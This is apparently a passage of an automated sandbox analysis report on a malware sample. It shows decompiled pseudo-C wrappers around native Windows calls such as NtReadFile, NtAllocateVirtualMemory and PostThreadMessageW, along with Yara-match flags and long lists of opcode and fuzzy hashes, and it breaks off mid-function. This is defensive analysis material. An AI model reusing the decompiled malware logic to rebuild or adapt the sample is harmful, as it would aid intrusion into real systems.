                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 8e43413bd6bea8ca697c278b49110fec8550050a1a8c03aa5043dc6e6a057a55
                                                                              • Instruction ID: bee90c2b06a91e8d7ddb0d9ebda198b2fdf455160e2ca5426b1dbaa36c462bf3
                                                                              • Opcode Fuzzy Hash: 8e43413bd6bea8ca697c278b49110fec8550050a1a8c03aa5043dc6e6a057a55
                                                                              • Instruction Fuzzy Hash: 2AF06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0D97241D630E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 307 41e5f3-41e63c call 41f1a3 NtReadFile
                                                                              C-Code - Quality: 37%
                                                                              			E0041E5F3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xb4812251
				_t27 = _t3;
				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                              0x0041e602
                                                                              0x0041e602
                                                                              0x0041e60a
                                                                              0x0041e638
                                                                              0x0041e63c

                                                                              APIs
                                                                              • NtReadFile.NTDLL(00419453,00414923,FFFFFFFF,00418F43,B48117DD,?,00419453,B48117DD,00418F43,FFFFFFFF,00414923,00419453,B48117DD,00000000), ref: 0041E638
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 9f821dfad68db956ba18a57aabf5e5b11366d5bcfceef126d6073c8e14a746af
                                                                              • Instruction ID: 1a3214232952a8e6833d8534ab6b6d105d0d062ce0fc1dd5f8c337f4470e1cc8
                                                                              • Opcode Fuzzy Hash: 9f821dfad68db956ba18a57aabf5e5b11366d5bcfceef126d6073c8e14a746af
                                                                              • Instruction Fuzzy Hash: 25F0AFB2214208ABCB14DF99DC85EEB77ADAF8C754F118259BA0DA7241D630E8118BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 310 41e723-41e760 call 41f1a3 NtAllocateVirtualMemory
                                                                              C-Code - Quality: 100%
                                                                              			E0041E723(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                              0x0041e73a
                                                                              0x0041e75c
                                                                              0x0041e760

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E75C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 5b328d73c64484efcd450aa28917ac0b5923770ee23ea5f31667fba9eb6c6682
                                                                              • Instruction ID: fc69ad288b6635a52355ed1933f6cfc63b81cbe29d7af1dca7c736bb41164d96
                                                                              • Opcode Fuzzy Hash: 5b328d73c64484efcd450aa28917ac0b5923770ee23ea5f31667fba9eb6c6682
                                                                              • Instruction Fuzzy Hash: AAF01EB2210208ABCB18DF89DC81EEB77ADAF88754F018219BE0897241C630F811CBB4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E673 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 327 41e673-41e69c call 41f1a3 NtClose
                                                                              C-Code - Quality: 100%
                                                                              			E0041E673(intOrPtr _a4, void* _a8) {
				long _t8;

				_t3 = _a4 + 0xa7c; // 0x63cd3d65
				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _t5, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                              0x0041e682
                                                                              0x0041e68a
                                                                              0x0041e698
                                                                              0x0041e69c

                                                                              APIs
                                                                              • NtClose.NTDLL(00419431,B48117DD,?,00419431,63CD32E9,FFFFFFFF), ref: 0041E698
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: a33605fea29c66241dc67ec43e72f15860f881aed4c1cb72ba13798beb301771
                                                                              • Instruction ID: 94e5ee63b43bdcb99c94ba18f59b3c55f276505dfa29a4d302564c7b8ad5ff88
                                                                              • Opcode Fuzzy Hash: a33605fea29c66241dc67ec43e72f15860f881aed4c1cb72ba13798beb301771
                                                                              • Instruction Fuzzy Hash: BDD01772604214BBE610EBA9DC89FD77BACDF88664F018469BA1C5B242C571FA0086E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f8ce91b017626d98117a1137444ac8321074be9fcedf98dd808d8d3b9ccf114c
                                                                              • Instruction ID: bf89b348796fb37362078d1db7456f50fa62f35ff3243a6cb309d27fac9052cf
                                                                              • Opcode Fuzzy Hash: f8ce91b017626d98117a1137444ac8321074be9fcedf98dd808d8d3b9ccf114c
                                                                              • Instruction Fuzzy Hash: 3B9002B120500407D190719984447864005E7D4345F51C031A5054554EC7999DD576A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 09ce53187922aeed2fc3ca7a84f9cb26f89ec95db7bbd1a2374458c51344ed6d
                                                                              • Instruction ID: 4c23129f3dcd4be09e5206ca891d16fb52c848c96e438d482d9465f4e912a6a1
                                                                              • Opcode Fuzzy Hash: 09ce53187922aeed2fc3ca7a84f9cb26f89ec95db7bbd1a2374458c51344ed6d
                                                                              • Instruction Fuzzy Hash: 229002A134500447D15061998454B464005E7E5345F51C035E1054554DC759DC527166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b2c23c40aaa04992f35acacd7e8035b7c06ccf09dcc59ae2b5c9cf7222af024e
                                                                              • Instruction ID: ec29041c547b21da538901b6f73412a0d2a10f7cfcc5b7622117d39d666e253b
                                                                              • Opcode Fuzzy Hash: b2c23c40aaa04992f35acacd7e8035b7c06ccf09dcc59ae2b5c9cf7222af024e
                                                                              • Instruction Fuzzy Hash: DA90027120500417D161619985447474009E7D4285F91C432A0414558DD7969952B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b566c2aeb3c069609cb65559540eed357507c7d33b3d2d21e85336c16124192f
                                                                              • Instruction ID: 6f1bad59ad5891fb4cd7fcb7281c3bc9439d2f5b8f342d97a5250d73c5e76795
                                                                              • Opcode Fuzzy Hash: b566c2aeb3c069609cb65559540eed357507c7d33b3d2d21e85336c16124192f
                                                                              • Instruction Fuzzy Hash: EA900261246041575595B19984446478006F7E4285791C032A1404950CC666A856F661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5380fef33b2082008051af4287cda7ba6f027408365515d134b18b8dc4de34ba
                                                                              • Instruction ID: 86d3ec40a8b41f3a150bdb413bf9e2caa496312c473e272e3393033f183013e2
                                                                              • Opcode Fuzzy Hash: 5380fef33b2082008051af4287cda7ba6f027408365515d134b18b8dc4de34ba
                                                                              • Instruction Fuzzy Hash: D190026160500507D15171998444756400AE7D4285F91C032A1014555ECB659992B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 051fe53ddfa1cd644e786550c35ea1d35ff9eb57e695c1ef0d54d6d6b1fd6f45
                                                                              • Instruction ID: 77a14058d86b00a517977837ec8cdcd31f60906994262b2390f44c3744bf029a
                                                                              • Opcode Fuzzy Hash: 051fe53ddfa1cd644e786550c35ea1d35ff9eb57e695c1ef0d54d6d6b1fd6f45
                                                                              • Instruction Fuzzy Hash: 4490026121580047D25065A98C54B474005E7D4347F51C135A0144554CCA5598617561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c11343bbf7d2e1803e0a3cfad31207179ba4300a6e45ba79e9b460f05e02ab76
                                                                              • Instruction ID: 594ebf715949d91fd8f333e6b776a2c2b9ceed7b5cfdf497f19a9035b5217840
                                                                              • Opcode Fuzzy Hash: c11343bbf7d2e1803e0a3cfad31207179ba4300a6e45ba79e9b460f05e02ab76
                                                                              • Instruction Fuzzy Hash: 8290026160500047419071A9C884A468005FBE5255751C131A0988550DC699986576A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6f4346717b5a4da9ea8270c0855de5e64b6a37bdfaba723ed5d6776fa6cab46f
                                                                              • Instruction ID: cfea96fc7769d41888ff79298a9b0028d227f44cb18f4580e34d471a65c4560c
                                                                              • Opcode Fuzzy Hash: 6f4346717b5a4da9ea8270c0855de5e64b6a37bdfaba723ed5d6776fa6cab46f
                                                                              • Instruction Fuzzy Hash: 6090027120540407D1506199885474B4005E7D4346F51C031A1154555DC765985175B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c8d4a49d9bf5b91047ceb733c9513ff8f6884e3bc5679fbb0a8379be14207f15
                                                                              • Instruction ID: 26bf645112633f8712980222838fc5c7e38993948d603cb5877410b854b988f9
                                                                              • Opcode Fuzzy Hash: c8d4a49d9bf5b91047ceb733c9513ff8f6884e3bc5679fbb0a8379be14207f15
                                                                              • Instruction Fuzzy Hash: 5F900475315000070155F5DD47447474047F7DD3D5351C031F1005550CD771DC717171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 51ca03c3446c7e1a7dda3ed649ac88d14d9cb940337ffd6905f05c6fafe0dea3
                                                                              • Instruction ID: cf92c9341c36ff4b9ebca7d8f71b5ee71904ddb52feb551751cac8b7fab021d0
                                                                              • Opcode Fuzzy Hash: 51ca03c3446c7e1a7dda3ed649ac88d14d9cb940337ffd6905f05c6fafe0dea3
                                                                              • Instruction Fuzzy Hash: C79002A120600007415571998454756800AE7E4245B51C031E1004590DC66598917165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5dfe6eda2f95a1dc15a589065cae9140dc9c38e781d62cc70c7bdd4fd67cffe0
                                                                              • Instruction ID: 27967f0df735340bff0dc56d354342f576563fcce5c6cd58c21ef45a9b908312
                                                                              • Opcode Fuzzy Hash: 5dfe6eda2f95a1dc15a589065cae9140dc9c38e781d62cc70c7bdd4fd67cffe0
                                                                              • Instruction Fuzzy Hash: 9A90027120500407D15065D994487864005E7E4345F51D031A5014555EC7A598917171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5ef0dc8ee42d05fa35c7b77114e137123fc3ba7d80cf8ca97b3c3a0d3fa6f22d
                                                                              • Instruction ID: 9c27735cab906f52e53157beedba43f929f44a0dd79add4eb9e9868af4705b38
                                                                              • Opcode Fuzzy Hash: 5ef0dc8ee42d05fa35c7b77114e137123fc3ba7d80cf8ca97b3c3a0d3fa6f22d
                                                                              • Instruction Fuzzy Hash: 8690027131514407D1606199C4447464005E7D5245F51C431A0814558DC7D598917162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 60d271d5fbe004eb511bf2c68ee63152bcc603485739d9f2064399213ba9ce83
                                                                              • Instruction ID: b0c9de6a312d45dc4b2cbd2d5ecaf59441ab43f22cc73cbb395fa774232520ad
                                                                              • Opcode Fuzzy Hash: 60d271d5fbe004eb511bf2c68ee63152bcc603485739d9f2064399213ba9ce83
                                                                              • Instruction Fuzzy Hash: 2590026130500007D190719994587468005F7E5345F51D031E0404554CDA5598567262
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 76f2ed20663e0903f002339e3ebaae59ffc76348598f6cc3aa9aac445d68110b
                                                                              • Instruction ID: 47de76d30ec4c54f2c34f3bc0a45f2871cd5e201f203ec7e9bb1872e93154a50
                                                                              • Opcode Fuzzy Hash: 76f2ed20663e0903f002339e3ebaae59ffc76348598f6cc3aa9aac445d68110b
                                                                              • Instruction Fuzzy Hash: FC90026921700007D1D07199944874A4005E7D5246F91D435A0005558CCA5598697361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2d72433ebfe9b431462f89c886826e239fa1f5e9decd3469c6127b4cba806910
                                                                              • Instruction ID: 6161ad4643dd317fe6a2b825c2317043d82548f13d16c5c30fc1ef3718c3e39b
                                                                              • Opcode Fuzzy Hash: 2d72433ebfe9b431462f89c886826e239fa1f5e9decd3469c6127b4cba806910
                                                                              • Instruction Fuzzy Hash: 6790027120500807D1D07199844478A4005E7D5345F91C035A0015654DCB559A5977E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 81b0e999fa1c433a65a352eeaf9fb14232ac1a2d2db6dfb46a9799d10f57a504
                                                                              • Instruction ID: 17e66e04f10e22f2c7bf9250c1343160c9797e17704b921740fa498ca1906775
                                                                              • Opcode Fuzzy Hash: 81b0e999fa1c433a65a352eeaf9fb14232ac1a2d2db6dfb46a9799d10f57a504
                                                                              • Instruction Fuzzy Hash: 7A90027120508807D1606199C44478A4005E7D4345F55C431A4414658DC7D598917161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E893 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 41e893-41e8bf call 41f1a3 ExitProcess
                                                                              C-Code - Quality: 100%
                                                                              			E0041E893(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1A3( *((intOrPtr*)(_a4 + 0x3c8)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x3c8)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                              0x0041e896
                                                                              0x0041e8ad
                                                                              0x0041e8bb

                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID: G5@
                                                                              • API String ID: 621844428-1585037681
                                                                              • Opcode ID: 38343bd9d8ea8d636d3e25dfb7530c5046de8c65cda3324aa79039f1d83d2e6f
                                                                              • Instruction ID: 169e6aca1737ab0175cdf51ee34b65a931fdb9cb5ba1fa435e03178f35cde5b1
                                                                              • Opcode Fuzzy Hash: 38343bd9d8ea8d636d3e25dfb7530c5046de8c65cda3324aa79039f1d83d2e6f
                                                                              • Instruction Fuzzy Hash: A8D012716003147BD620DB99CC45FD7779CDF45694F014065BA4C5B241C575BA40C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040984B Relevance: 1.6, APIs: 1, Instructions: 65threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 256 40984b-409852 257 409854-4098a7 call 420173 call 420c23 call 40cec3 call 402de3 call 419533 256->257 258 4098a9-4098ba PostThreadMessageW 256->258 257->258 260 4098dd-4098e3 257->260 259 4098bc-4098da call 40c593 258->259 258->260 259->260
                                                                              C-Code - Quality: 63%
                                                                              			E0040984B(void* __eax, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t15;
				int _t17;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				asm("cli");
				asm("out dx, al");
				asm("loop 0x57");
				_t36 = _t38;
				_v68 = 0;
				E00420173( &_v67, 0, 0x3f);
				E00420C23( &_v68, 3);
				_t21 = _a4;
				_t15 = E0040CEC3(_t43, _a4 + 0x20,  &_v68); // executed
				_t17 = E00419533(_a4 + 0x20, _t15, 0, 0, E00402DE3(0x5fc6569a));
				_t33 = _t17;
				if(_t33 != 0) {
					_t30 = _a8;
					_t17 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t17 == 0) {
						_t17 =  *_t33(_t30, 0x8003, _t36 + (E0040C593(1, 8, _t21 + 0x50) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}












                                                                              0x0040984b
                                                                              0x0040984b
                                                                              0x0040984c
                                                                              0x00409852
                                                                              0x00409854
                                                                              0x00409864
                                                                              0x00409868
                                                                              0x00409873
                                                                              0x00409878
                                                                              0x00409883
                                                                              0x0040989b
                                                                              0x004098a0
                                                                              0x004098a7
                                                                              0x004098a9
                                                                              0x004098b6
                                                                              0x004098ba
                                                                              0x004098db
                                                                              0x004098db
                                                                              0x004098ba
                                                                              0x004098e3

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(00009C09,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 9b75ed7ad5f8e3ca66a5132504e956011953fbf05113087f58ced9b528096c1f
                                                                              • Instruction ID: 6079ab7f88d9a4e533a494ec55fd4b53922cf0932dae58e25442cca6f4957e7f
                                                                              • Opcode Fuzzy Hash: 9b75ed7ad5f8e3ca66a5132504e956011953fbf05113087f58ced9b528096c1f
                                                                              • Instruction Fuzzy Hash: 0B110C72A4021576E7107791AC82FFF376C9F41B44F54412DFB047A2C2D6E89D0643E5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409853 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 273 409853-409864 274 40986d-4098a7 call 420c23 call 40cec3 call 402de3 call 419533 273->274 275 409868 call 420173 273->275 284 4098a9-4098ba PostThreadMessageW 274->284 285 4098dd-4098e3 274->285 275->274 284->285 286 4098bc-4098da call 40c593 284->286 286->285
                                                                              C-Code - Quality: 84%
                                                                              			E00409853(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420173( &_v67, 0, 0x3f);
				E00420C23( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CEC3(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419533(_a4 + 0x20, _t13, 0, 0, E00402DE3(0x5fc6569a));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
